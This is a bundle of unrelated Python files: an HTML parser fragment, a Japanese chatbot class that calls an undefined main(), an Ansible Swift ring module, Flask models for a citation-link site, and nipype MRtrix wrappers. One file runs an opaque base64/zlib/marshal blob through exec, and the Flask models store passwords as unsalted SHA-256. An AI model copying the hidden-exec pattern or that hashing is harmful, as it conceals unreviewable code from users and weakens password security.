'area', 'base', 'br', 'col', 'embed', 'hr', 'img', 'input', 'link', 'meta',
'param', 'source', 'track', 'wbr',
# Deprecated tags
'frame', 'spacer',
}
def __init__(self):
super().__init__()
self.root = RootElement()
self.open_tags = []
self.element_positions = {}
def error(self, msg):
raise HTMLParseError(msg, self.getpos())
def format_position(self, position=None, element=None):
if not position and element:
position = self.element_positions[element]
if position is None:
position = self.getpos()
if hasattr(position, 'lineno'):
position = position.lineno, position.offset
return 'Line %d, Column %d' % position
@property
def current(self):
if self.open_tags:
return self.open_tags[-1]
else:
return self.root
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
if tag not in self.SELF_CLOSING_TAGS:
self.handle_endtag(tag)
def handle_starttag(self, tag, attrs):
# Special case handling of 'class' attribute, so that comparisons of DOM
# instances are not sensitive to ordering of classes.
attrs = [
(name, ' '.join(sorted(value for value in ASCII_WHITESPACE.split(value) if value)))
if name == "class"
else (name, value)
for name, value in attrs
]
element = Element(tag, attrs)
self.current.append(element)
if tag not in self.SELF_CLOSING_TAGS:
self.open_tags.append(element)
self.element_positions[element] = self.getpos()
def handle_endtag(self, tag):
if not self.open_tags:
self.error("Unexpected end tag `%s` (%s)" % (
tag, self.format_position()))
element = self.open_tags.pop()
while element.name != tag:
if not self.open_tags:
self.error("Unexpected end tag `%s` (%s)" % (
tag, self.format_position()))
element = self.open_tags.pop()
def handle_data(self, data):
self.current.append(data)
def parse_html(html):
"""
Take a string that contains HTML and turn it into a Python object structure
that can be easily compared against other HTML on semantic equivalence.
Syntactical differences like which quotation is used on arguments will be
ignored.
"""
parser = Parser()
parser.feed(html)
parser.close()
document = parser.root
document.finalize()
# Removing ROOT element if it's not necessary
if len(document.children) == 1 and not isinstance(document.children[0], str):
document = document.children[0]
return document
|
python
|
# coding:utf-8
import MeCab
import codecs
from model import Seq2Seq
import chainer
import json
import sys
import io
class Chatbot:
def __init__(self, dirname):
self.dir = 'model/' + dirname + '/'
self.dict_i2w = self.dir + 'dictionary_i2w.json'
self.dict_w2i = self.dir + 'dictionary_w2i.json'
self.modelname = self.dir + 'model.npz'
def initialize(self):
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
self.tagger = MeCab.Tagger('-Owakati')
self.id2word = json.load(open(self.dict_i2w, "r"))
self.id2word = {int(key): value for key, value in self.id2word.items()}
self.word2id = json.load(open(self.dict_w2i, "r"))
self.model = Seq2Seq(input_words=len(self.word2id), train=False)
chainer.serializers.load_npz(self.modelname, self.model)
def get_reply(self,message):
try:
parsed_sentence = []
sentence = self.tagger.parse(message)[:-1]
for surface in sentence.split(' '):
parsed_sentence.append(surface)
parsed_sentence = ["<start>"] + parsed_sentence + ["<eos>"]
ids = []
for word in parsed_sentence:
if word in self.word2id:
id = self.word2id[word]
ids.append(id)
else:
ids.append(0)
ids_question = ids
sentence = "".join(self.model.generate_sentence(ids_question, dictionary=self.id2word)).encode("utf-8")
return sentence.decode('utf-8')
except Exception as e:
return e, '解析できませんでした。。。'
if __name__ == "__main__":
main()
|
python
|
#!/usr/bin/python
#coding: utf-8 -*-
#
# (c) 2014, Craig Tracey <[email protected]>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
author: Craig Tracey
'''
import os
from subprocess import check_call, CalledProcessError
def _run_ring_command(module, command, builder_file, force, *args):
    cmd = ['swift-ring-builder', builder_file, command] + [str(a) for a in args]
    try:
        check_call(cmd)
    except (CalledProcessError, OSError) as e:
        module.fail_json(msg="Error running swift-ring-builder command '%s': %s" %
                         (" ".join(cmd), str(e)))
    return True
def swift_ring_create(module, builder_file, part_power, replicas,
min_part_hours, force=False):
return _run_ring_command(module, 'create', builder_file, force,
part_power, replicas, min_part_hours)
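# Example (sketch, assuming a typical object-ring builder path):
#   swift_ring_create(module, '/etc/swift/object.builder', 10, 3, 1)
# runs a command equivalent to:
#   swift-ring-builder /etc/swift/object.builder create 10 3 1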
def swift_ring_add(module, builder_file, zone, ip, port, device_name, meta,
weight, force=False):
device_str = "z%(zone)s-%(ip)s:%(port)s/%(device_name)s_%(meta)s" % \
locals()
return _run_ring_command(module, 'add', builder_file, force,
device_str, weight)
def swift_ring_rebalance(module, builder_file, ring_type, force=False):
if not force and os.path.exists("/etc/swift/%s.ring.gz" % ring_type):
return False
return _run_ring_command(module, 'rebalance', builder_file, force)
def main():
module = AnsibleModule(
argument_spec=dict(
action=dict(required=True,
choices=['create', 'add', 'rebalance']),
ring_type=dict(required=True,
choices=['account', 'container', 'object']),
builder_file=dict(required=True),
part_power=dict(required=False),
replicas=dict(required=False),
min_part_hours=dict(required=False),
zone=dict(required=False),
ip=dict(required=False),
port=dict(required=False),
device_name=dict(required=False),
meta=dict(required=False),
weight=dict(required=False),
force=dict(required=False, default=False)
)
)
changed = False
params = module.params
if params['action'] == 'create':
changed = swift_ring_create(module,
params['builder_file'],
params['part_power'],
params['replicas'],
params['min_part_hours'],
params['force'])
elif params['action'] == 'add':
changed = swift_ring_add(module,
params['builder_file'],
params['zone'],
params['ip'],
params['port'],
params['device_name'],
params['meta'],
params['weight'],
params['force'])
elif params['action'] == 'rebalance':
changed = swift_ring_rebalance(module,
params['builder_file'],
params['ring_type'],
params['force'])
module.exit_json(changed=changed)
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
|
python
|
# Obfuscated by Py Compile
# Created by Wh!73 D3v!1 (https://github.com/WHI73-D3VI1)
# Facebook : (https://www.facebook.com/WHI73.D3VI1)
# Don't try to edit or modify this tool
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("eJzNVd1PG0cQn7vDGBscvsJHoE2XUiduUr4bSFHUBoWGoDaUAirSIYQMt9hnfD7Huw6hSitVtM9IVaW0fYja/4I/Ik/9E3jtQ1/71HRm7ozPAR4a9SF7vvXsb2Z+szu3O7sDYWvC9y6+6qYF4ODPgCKAfSobYBs12QTbrMkW2FZNbgK7CaQBhRg4JhwaYDgWfI8szWzRBMU4eHGw42DIOBRa4BB1LSBboJAAO8FCEuwkC61gt7LQBnYbCymwUyAtKFjcX+K+HQ5xOh0gm6DQCU6MwtpdtVk08yykCYVucOJnB04LLDyQOL1EVJcMBgi3RuG2YBBldlLkHyCXour2qGNHYNsZxmog7TqHtJsMG+YcqC+fQ9oTkvZetLjL4PRxUnpA9oLTz3JfY4KcKxdEHIgOBqODt05z9PY5ka8in/POq6SOqCPh9IfqyLsBMnwGea+OpAPk2hnkeh3JBMj7YPfDkw2QV6ByzZIdUBgAiRsD09AHuyZtG0P2g3MD+tAQMZbw7yYgHJpZ0Iu8CH4AeyZUXphohDaPXpj4W8c9v5oZwUPjvsS2pLpQLO/lhFtSOlssil03V5R6x0DYxBcPFtyjI0bdkzvwlE9N3/zmOHxjgAYoYGpNeGrwAsKxRYfE0E2RQ/WoFdbxPK1miHBJEX0yd3z1hz+/PH7+SaYZh5o06kBpGijt+FWtYyjuV1wtWdotVlVe06HXrhdAqihlOUMT1UT5NfcyQ8WBO0UqJ8fcZbWdIqiFFEan0WGkjAzZa0KcLEZBWvcP5GXunaLMVlwiUDQc3Pho0uN0JZMbQ5vicz/ruKXcKLVcWI/uqh7Sk3oZvZUU61lXBya//kItdjckm7rlqTZaFOdbrD9YnJmKAvNTXy1OuFY9+tSUF4bpOuWY9lRnxEU+dotift5X6m+D9be95PDIa7Th5LBobIv6uhIPpTj5+be/jo/Een5oZgrn+HhoogY1NCL49j8/7CYWXJ2vbiPJrBA5lkd3fG+MMzTCaRlLnAkm7md35Lbv76FXXuuymh0b29/fH90N4TrFKFPU3NZkUeYqWS/ipkc9Obaex13HCZ0cn5x+Jdr/k9Kg1T+aOLOq14ujfg9267R38uzo5Kfv3sTfsyPe64vLYi1byeHenRUMLPsVHSwfASoEAnfxhKdaI7uc9neqPp7TOruzp9rryKrOVjQeTfX8DU8EZiE8yDOeiqO0MbopxtNCJVjGtilupXmxPGJgcjztUg1UHRGYNR+Op1V3I8j4NHpwsew5oyT1bXQbOEcTaCfG0Zu+hEulx6V6qW4Ek57wVmVJi7QSZfwCmHjt00DnK341l9eijB9zNq3cf15iNR5EnxWi0FRRfbXCdZxrvU/OLFayJcf3AhRvAumtUGleSdSuh5K/z/U/71crbOW5pSrWbYsL+AGXbc8v6eCWOMD6rSmtc/e3Fpc+XdNJlFe/uPfZ1vzCytxDtqHgXP+3qmFw4tg+0FKtkKQTPK39LbdUxguJ5u6W2SYAiIPWGZBhOlhYq1RlsApZcrRfv48aLiUKe8fznWpRfszf50fs2ozwMVNmIt6BUqL2WP1Gu5Uy6IkZSezxNUmOYNbpuDWwiQVcp1apEI0ZqQvfZozWi3ZJowu9/wWv+7J2"))))
|
python
|
import datetime
import hashlib
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin
from tldr import app
from urllib.parse import urlparse
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
db = SQLAlchemy(app)
def baseN(num, b, numerals='0123456789abcdefghijklmnopqrstuvwxyz'):
return ((num == 0) and numerals[0]) or (
baseN(num // b, b, numerals).lstrip(numerals[0]) + numerals[num % b])
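# Example (sketch): baseN(2000, 36) == '1jk', since 2000 = 1*36**2 + 19*36 + 20 and
# digits 1, 19, 20 map to '1', 'j', 'k'; Citation.short_id applies this to id + OFFSET.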
def hash_password(password):
h = hashlib.sha256()
h.update(password.encode("utf-8"))
return h.hexdigest()
class Citation(db.Model):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
OFFSET = 1000
id = db.Column(db.Integer, primary_key=True)
url = db.Column(db.Unicode(length=2048), nullable=False)
data = db.Column(db.UnicodeText, nullable=False)
created = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
deleted = db.Column(db.DateTime)
user_agent = db.Column(db.String(length=4094))
views = db.relationship(
'CitationView', order_by='desc(CitationView.time)', lazy='dynamic')
def __init__(self, url, data, user_agent):
self.url = url
self.data = data
self.user_agent = user_agent
def short_id(self):
return baseN(self.id + self.OFFSET, 36)
def short_url(self):
parsed_url = urlparse(self.url)
return "%s://tldrify.com/%s" % (parsed_url.scheme, self.short_id())
@staticmethod
def short_id_to_id(id):
return int(id, 36) - Citation.OFFSET
@staticmethod
def by_short_id(id):
try:
return Citation.query.filter_by(id=Citation.short_id_to_id(
id)).filter_by(deleted=None).first()
except ValueError:
return None
class CitationView(db.Model):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
id = db.Column(db.Integer, primary_key=True)
citation_id = db.Column(db.Integer, db.ForeignKey('citation.id'))
time = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
user_agent = db.Column(db.String(length=4094))
xpath_failure = db.Column(db.Boolean, nullable=False, default=False)
def __init__(self, citation_id, user_agent):
self.citation_id = citation_id
self.user_agent = user_agent
class User(db.Model, UserMixin):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.Unicode(length=255), unique=True, nullable=False)
password = db.Column(db.Unicode(length=255), nullable=False)
created = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
active = db.Column(db.Boolean, nullable=False, default=True)
citations = db.relationship(
'Citation', order_by='desc(Citation.created)', lazy='dynamic')
def __init__(self, email, password, active=True):
self.email = email
self.password = password
self.active = active
def is_active(self):
return self.active
def get_token(self, expiration=1800):
s = Serializer(app.config['SECRET_KEY'], expiration)
return s.dumps({'user': self.id}).decode('utf-8')
@staticmethod
def verify_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
data = s.loads(token)
        except Exception:
return None
id = data.get('user')
if id:
return User.query.get(id)
return None
class MailTask(db.Model):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
id = db.Column(db.Integer, primary_key=True)
recipient = db.Column(db.Unicode(length=255), nullable=False)
subject = db.Column(db.Unicode(length=255), nullable=False)
body = db.Column(db.UnicodeText, nullable=False)
submitted = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
sent = db.Column(db.DateTime)
def __init__(self, recipient, subject, body):
self.recipient = recipient
self.subject = subject
self.body = body
|
python
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
from __future__ import (print_function, division, unicode_literals,
absolute_import)
import os.path as op
import numpy as np
from ... import logging
from ...utils.filemanip import split_filename
from ..base import (CommandLineInputSpec, CommandLine, BaseInterface, traits,
File, TraitedSpec, isdefined)
iflogger = logging.getLogger('interface')
class DWI2SphericalHarmonicsImageInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc='Diffusion-weighted images')
out_filename = File(
genfile=True, argstr='%s', position=-1, desc='Output filename')
encoding_file = File(
exists=True,
argstr='-grad %s',
mandatory=True,
position=1,
desc=
        'Gradient encoding, supplied as a 4xN text file with each line in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient, and b gives the b-value in units (1000 s/mm^2). See FSL2MRTrix'
)
maximum_harmonic_order = traits.Float(
argstr='-lmax %s',
desc=
'set the maximum harmonic order for the output series. By default, the program will use the highest possible lmax given the number of diffusion-weighted images.'
)
normalise = traits.Bool(
argstr='-normalise',
position=3,
desc="normalise the DW signal to the b=0 image")
class DWI2SphericalHarmonicsImageOutputSpec(TraitedSpec):
spherical_harmonics_image = File(
exists=True, desc='Spherical harmonics image')
class DWI2SphericalHarmonicsImage(CommandLine):
"""
Convert base diffusion-weighted images to their spherical harmonic representation.
    This program outputs the spherical harmonic decomposition for the set of measured signal attenuations.
The signal attenuations are calculated by identifying the b-zero images from the diffusion encoding supplied
(i.e. those with zero as the b-value), and dividing the remaining signals by the mean b-zero signal intensity.
The spherical harmonic decomposition is then calculated by least-squares linear fitting.
Note that this program makes use of implied symmetries in the diffusion profile.
    First, the fact that the signal attenuation profile is real implies that it has conjugate symmetry,
i.e. Y(l,-m) = Y(l,m)* (where * denotes the complex conjugate). Second, the diffusion profile should be
antipodally symmetric (i.e. S(x) = S(-x)), implying that all odd l components should be zero. Therefore,
this program only computes the even elements.
Note that the spherical harmonics equations used here differ slightly from those conventionally used,
in that the (-1)^m factor has been omitted. This should be taken into account in all subsequent calculations.
Each volume in the output image corresponds to a different spherical harmonic component, according to the following convention:
* [0] Y(0,0)
* [1] Im {Y(2,2)}
* [2] Im {Y(2,1)}
* [3] Y(2,0)
* [4] Re {Y(2,1)}
* [5] Re {Y(2,2)}
* [6] Im {Y(4,4)}
* [7] Im {Y(4,3)}
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> dwi2SH = mrt.DWI2SphericalHarmonicsImage()
>>> dwi2SH.inputs.in_file = 'diffusion.nii'
>>> dwi2SH.inputs.encoding_file = 'encoding.txt'
>>> dwi2SH.run() # doctest: +SKIP
"""
_cmd = 'dwi2SH'
input_spec = DWI2SphericalHarmonicsImageInputSpec
output_spec = DWI2SphericalHarmonicsImageOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['spherical_harmonics_image'] = self.inputs.out_filename
if not isdefined(outputs['spherical_harmonics_image']):
outputs['spherical_harmonics_image'] = op.abspath(
self._gen_outfilename())
else:
outputs['spherical_harmonics_image'] = op.abspath(
outputs['spherical_harmonics_image'])
return outputs
def _gen_filename(self, name):
if name == 'out_filename':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, name, _ = split_filename(self.inputs.in_file)
return name + '_SH.mif'
class ConstrainedSphericalDeconvolutionInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-3,
desc='diffusion-weighted image')
response_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc=
'the diffusion-weighted signal response function for a single fibre population (see EstimateResponse)'
)
out_filename = File(
genfile=True, argstr='%s', position=-1, desc='Output filename')
mask_image = File(
exists=True,
argstr='-mask %s',
position=2,
desc=
'only perform computation within the specified binary brain mask image'
)
encoding_file = File(
exists=True,
argstr='-grad %s',
position=1,
desc=
        'Gradient encoding, supplied as a 4xN text file in which each line is in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient, and b gives the b-value in units (1000 s/mm^2). See FSL2MRTrix'
)
filter_file = File(
exists=True,
argstr='-filter %s',
position=-2,
desc=
        'a text file containing the filtering coefficients for each even harmonic order. '
'the linear frequency filtering parameters used for the initial linear spherical deconvolution step (default = [ 1 1 1 0 0 ]).'
)
lambda_value = traits.Float(
argstr='-lambda %s',
desc=
'the regularisation parameter lambda that controls the strength of the constraint (default = 1.0).'
)
maximum_harmonic_order = traits.Int(
argstr='-lmax %s',
desc=
'set the maximum harmonic order for the output series. By default, the program will use the highest possible lmax given the number of diffusion-weighted images.'
)
threshold_value = traits.Float(
argstr='-threshold %s',
desc=
'the threshold below which the amplitude of the FOD is assumed to be zero, expressed as a fraction of the mean value of the initial FOD (default = 0.1)'
)
iterations = traits.Int(
argstr='-niter %s',
desc=
'the maximum number of iterations to perform for each voxel (default = 50)'
)
debug = traits.Bool(argstr='-debug', desc='Display debugging messages.')
directions_file = File(
exists=True,
argstr='-directions %s',
position=-2,
desc=
'a text file containing the [ el az ] pairs for the directions: Specify the directions over which to apply the non-negativity constraint (by default, the built-in 300 direction set is used)'
)
normalise = traits.Bool(
argstr='-normalise',
position=3,
desc="normalise the DW signal to the b=0 image")
class ConstrainedSphericalDeconvolutionOutputSpec(TraitedSpec):
spherical_harmonics_image = File(
exists=True, desc='Spherical harmonics image')
class ConstrainedSphericalDeconvolution(CommandLine):
"""
Perform non-negativity constrained spherical deconvolution.
Note that this program makes use of implied symmetries in the diffusion profile.
    First, the fact that the signal attenuation profile is real implies that it has conjugate symmetry,
i.e. Y(l,-m) = Y(l,m)* (where * denotes the complex conjugate). Second, the diffusion profile should be
antipodally symmetric (i.e. S(x) = S(-x)), implying that all odd l components should be zero.
Therefore, this program only computes the even elements. Note that the spherical harmonics equations used here
differ slightly from those conventionally used, in that the (-1)^m factor has been omitted. This should be taken
into account in all subsequent calculations. Each volume in the output image corresponds to a different spherical
harmonic component, according to the following convention:
* [0] Y(0,0)
* [1] Im {Y(2,2)}
* [2] Im {Y(2,1)}
* [3] Y(2,0)
* [4] Re {Y(2,1)}
* [5] Re {Y(2,2)}
* [6] Im {Y(4,4)}
* [7] Im {Y(4,3)}
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> csdeconv = mrt.ConstrainedSphericalDeconvolution()
>>> csdeconv.inputs.in_file = 'dwi.mif'
>>> csdeconv.inputs.encoding_file = 'encoding.txt'
>>> csdeconv.run() # doctest: +SKIP
"""
_cmd = 'csdeconv'
input_spec = ConstrainedSphericalDeconvolutionInputSpec
output_spec = ConstrainedSphericalDeconvolutionOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['spherical_harmonics_image'] = self.inputs.out_filename
if not isdefined(outputs['spherical_harmonics_image']):
outputs['spherical_harmonics_image'] = op.abspath(
self._gen_outfilename())
else:
outputs['spherical_harmonics_image'] = op.abspath(
outputs['spherical_harmonics_image'])
return outputs
def _gen_filename(self, name):
if name == 'out_filename':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, name, _ = split_filename(self.inputs.in_file)
return name + '_CSD.mif'
class EstimateResponseForSHInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-3,
desc='Diffusion-weighted images')
mask_image = File(
exists=True,
mandatory=True,
argstr='%s',
position=-2,
desc=
'only perform computation within the specified binary brain mask image'
)
out_filename = File(
genfile=True, argstr='%s', position=-1, desc='Output filename')
encoding_file = File(
exists=True,
argstr='-grad %s',
mandatory=True,
position=1,
desc=
        'Gradient encoding, supplied as a 4xN text file in which each line is in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient, and b gives the b-value in units (1000 s/mm^2). See FSL2MRTrix'
)
maximum_harmonic_order = traits.Int(
argstr='-lmax %s',
desc=
'set the maximum harmonic order for the output series. By default, the program will use the highest possible lmax given the number of diffusion-weighted images.'
)
normalise = traits.Bool(
argstr='-normalise', desc='normalise the DW signal to the b=0 image')
quiet = traits.Bool(
argstr='-quiet',
desc='Do not display information messages or progress status.')
debug = traits.Bool(argstr='-debug', desc='Display debugging messages.')
class EstimateResponseForSHOutputSpec(TraitedSpec):
response = File(exists=True, desc='Spherical harmonics image')
class EstimateResponseForSH(CommandLine):
"""
Estimates the fibre response function for use in spherical deconvolution.
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> estresp = mrt.EstimateResponseForSH()
>>> estresp.inputs.in_file = 'dwi.mif'
>>> estresp.inputs.mask_image = 'dwi_WMProb.mif'
>>> estresp.inputs.encoding_file = 'encoding.txt'
>>> estresp.run() # doctest: +SKIP
"""
_cmd = 'estimate_response'
input_spec = EstimateResponseForSHInputSpec
output_spec = EstimateResponseForSHOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['response'] = self.inputs.out_filename
if not isdefined(outputs['response']):
outputs['response'] = op.abspath(self._gen_outfilename())
else:
outputs['response'] = op.abspath(outputs['response'])
return outputs
def _gen_filename(self, name):
if name == 'out_filename':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, name, _ = split_filename(self.inputs.in_file)
return name + '_ER.txt'
def concat_files(bvec_file, bval_file, invert_x, invert_y, invert_z):
bvecs = np.loadtxt(bvec_file)
bvals = np.loadtxt(bval_file)
if np.shape(bvecs)[0] > np.shape(bvecs)[1]:
bvecs = np.transpose(bvecs)
if invert_x:
bvecs[0, :] = -bvecs[0, :]
iflogger.info('Inverting b-vectors in the x direction')
if invert_y:
bvecs[1, :] = -bvecs[1, :]
iflogger.info('Inverting b-vectors in the y direction')
if invert_z:
bvecs[2, :] = -bvecs[2, :]
iflogger.info('Inverting b-vectors in the z direction')
iflogger.info(np.shape(bvecs))
iflogger.info(np.shape(bvals))
encoding = np.transpose(np.vstack((bvecs, bvals)))
_, bvec, _ = split_filename(bvec_file)
_, bval, _ = split_filename(bval_file)
out_encoding_file = bvec + '_' + bval + '.txt'
np.savetxt(out_encoding_file, encoding)
return out_encoding_file
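# Illustrative direct call (hypothetical file names, not from this module): this writes
# 'bvecs_bvals.txt' with one [ X Y Z b ] row per gradient and returns that filename.
#
#     out_encoding = concat_files('bvecs', 'bvals', invert_x=False, invert_y=True, invert_z=False)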
class FSL2MRTrixInputSpec(TraitedSpec):
bvec_file = File(
exists=True, mandatory=True, desc='FSL b-vectors file (3xN text file)')
bval_file = File(
exists=True, mandatory=True, desc='FSL b-values file (1xN text file)')
invert_x = traits.Bool(
False, usedefault=True, desc='Inverts the b-vectors along the x-axis')
invert_y = traits.Bool(
False, usedefault=True, desc='Inverts the b-vectors along the y-axis')
invert_z = traits.Bool(
False, usedefault=True, desc='Inverts the b-vectors along the z-axis')
out_encoding_file = File(genfile=True, desc='Output encoding filename')
class FSL2MRTrixOutputSpec(TraitedSpec):
encoding_file = File(
desc=
        'The gradient encoding, supplied as a 4xN text file in which each line is in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient '
'and b gives the b-value in units (1000 s/mm^2).')
class FSL2MRTrix(BaseInterface):
"""
Converts separate b-values and b-vectors from text files (FSL style) into a
4xN text file in which each line is in the format [ X Y Z b ], where [ X Y Z ]
describe the direction of the applied gradient, and b gives the
b-value in units (1000 s/mm^2).
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> fsl2mrtrix = mrt.FSL2MRTrix()
>>> fsl2mrtrix.inputs.bvec_file = 'bvecs'
>>> fsl2mrtrix.inputs.bval_file = 'bvals'
>>> fsl2mrtrix.inputs.invert_y = True
>>> fsl2mrtrix.run() # doctest: +SKIP
"""
input_spec = FSL2MRTrixInputSpec
output_spec = FSL2MRTrixOutputSpec
def _run_interface(self, runtime):
encoding = concat_files(self.inputs.bvec_file, self.inputs.bval_file,
self.inputs.invert_x, self.inputs.invert_y,
self.inputs.invert_z)
return runtime
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['encoding_file'] = op.abspath(
self._gen_filename('out_encoding_file'))
return outputs
def _gen_filename(self, name):
if name == 'out_encoding_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, bvec, _ = split_filename(self.inputs.bvec_file)
_, bval, _ = split_filename(self.inputs.bval_file)
return bvec + '_' + bval + '.txt'
class GenerateDirectionsInputSpec(CommandLineInputSpec):
num_dirs = traits.Int(
mandatory=True,
argstr='%s',
position=-2,
desc='the number of directions to generate.')
power = traits.Float(
argstr='-power %s',
desc='specify exponent to use for repulsion power law.')
niter = traits.Int(
argstr='-niter %s',
desc='specify the maximum number of iterations to perform.')
display_info = traits.Bool(
argstr='-info', desc='Display information messages.')
quiet_display = traits.Bool(
argstr='-quiet',
desc='do not display information messages or progress status.')
display_debug = traits.Bool(
argstr='-debug', desc='Display debugging messages.')
out_file = File(
name_source=['num_dirs'],
name_template='directions_%d.txt',
argstr='%s',
hash_files=False,
position=-1,
desc='the text file to write the directions to, as [ az el ] pairs.')
class GenerateDirectionsOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='directions file')
class GenerateDirections(CommandLine):
"""
generate a set of directions evenly distributed over a hemisphere.
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> gendir = mrt.GenerateDirections()
>>> gendir.inputs.num_dirs = 300
>>> gendir.run() # doctest: +SKIP
"""
_cmd = 'gendir'
input_spec = GenerateDirectionsInputSpec
output_spec = GenerateDirectionsOutputSpec
class FindShPeaksInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-3,
desc='the input image of SH coefficients.')
directions_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc='the set of directions to use as seeds for the peak finding')
peaks_image = File(
exists=True,
argstr='-peaks %s',
desc=
'the program will try to find the peaks that most closely match those in the image provided'
)
num_peaks = traits.Int(
argstr='-num %s', desc='the number of peaks to extract (default is 3)')
peak_directions = traits.List(
traits.Float,
argstr='-direction %s',
sep=' ',
minlen=2,
maxlen=2,
desc=
'phi theta. the direction of a peak to estimate. The algorithm will attempt to find the same number of peaks as have been specified using this option '
' phi: the azimuthal angle of the direction (in degrees). theta: the elevation angle of the direction (in degrees, from the vertical z-axis)'
)
peak_threshold = traits.Float(
argstr='-threshold %s',
desc=
'only peak amplitudes greater than the threshold will be considered')
display_info = traits.Bool(
argstr='-info', desc='Display information messages.')
quiet_display = traits.Bool(
argstr='-quiet',
desc='do not display information messages or progress status.')
display_debug = traits.Bool(
argstr='-debug', desc='Display debugging messages.')
out_file = File(
name_template="%s_peak_dirs.mif",
keep_extension=False,
argstr='%s',
hash_files=False,
position=-1,
desc=
'the output image. Each volume corresponds to the x, y & z component of each peak direction vector in turn',
name_source=["in_file"])
class FindShPeaksOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='Peak directions image')
class FindShPeaks(CommandLine):
"""
identify the orientations of the N largest peaks of a SH profile
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> shpeaks = mrt.FindShPeaks()
>>> shpeaks.inputs.in_file = 'csd.mif'
>>> shpeaks.inputs.directions_file = 'dirs.txt'
>>> shpeaks.inputs.num_peaks = 2
>>> shpeaks.run() # doctest: +SKIP
"""
_cmd = 'find_SH_peaks'
input_spec = FindShPeaksInputSpec
output_spec = FindShPeaksOutputSpec
class Directions2AmplitudeInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc=
'the input directions image. Each volume corresponds to the x, y & z component of each direction vector in turn.'
)
peaks_image = File(
exists=True,
argstr='-peaks %s',
desc=
'the program will try to find the peaks that most closely match those in the image provided'
)
num_peaks = traits.Int(
argstr='-num %s', desc='the number of peaks to extract (default is 3)')
peak_directions = traits.List(
traits.Float,
argstr='-direction %s',
sep=' ',
minlen=2,
maxlen=2,
desc=
'phi theta. the direction of a peak to estimate. The algorithm will attempt to find the same number of peaks as have been specified using this option '
' phi: the azimuthal angle of the direction (in degrees). theta: the elevation angle of the direction (in degrees, from the vertical z-axis)'
)
display_info = traits.Bool(
argstr='-info', desc='Display information messages.')
quiet_display = traits.Bool(
argstr='-quiet',
desc='do not display information messages or progress status.')
display_debug = traits.Bool(
argstr='-debug', desc='Display debugging messages.')
out_file = File(
name_template="%s_amplitudes.mif",
keep_extension=False,
argstr='%s',
hash_files=False,
position=-1,
desc='the output amplitudes image',
name_source=["in_file"])
class Directions2AmplitudeOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='amplitudes image')
class Directions2Amplitude(CommandLine):
"""
convert directions image to amplitudes
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> amplitudes = mrt.Directions2Amplitude()
>>> amplitudes.inputs.in_file = 'peak_directions.mif'
>>> amplitudes.run() # doctest: +SKIP
"""
_cmd = 'dir2amp'
input_spec = Directions2AmplitudeInputSpec
output_spec = Directions2AmplitudeOutputSpec
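# A minimal pipeline sketch (not part of this module; node names and wiring are
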